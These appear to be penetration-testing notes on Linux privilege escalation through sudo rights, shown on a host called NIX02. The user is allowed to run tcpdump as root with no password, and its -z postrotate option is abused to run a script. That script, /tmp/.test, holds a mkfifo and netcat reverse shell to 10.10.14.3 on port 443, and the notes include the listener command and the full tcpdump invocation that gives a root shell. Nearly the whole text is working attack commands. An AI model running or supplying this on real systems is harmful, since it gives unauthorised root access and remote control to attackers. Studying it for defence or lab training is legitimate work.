Sudo Rights Abuse
Sample Exploitation
Find files where we can execute as higher priv user or root
$ sudo -l Matching Defaults entries for sysadm on NIX02: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User sysadm may run the following commands on NIX02: (root) NOPASSWD: /usr/sbin/tcpdumpCheck the manual or find gtfobin
$ man tcpdump <SNIP> -z postrorate-command Used in conjunction with the -C or -G options, this will make `tcpdump` run " postrotate-command file " where the file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.Create a listener
$ nc -lnvp 443Exploit
$ cat /tmp/.test rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f $ sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
Last updated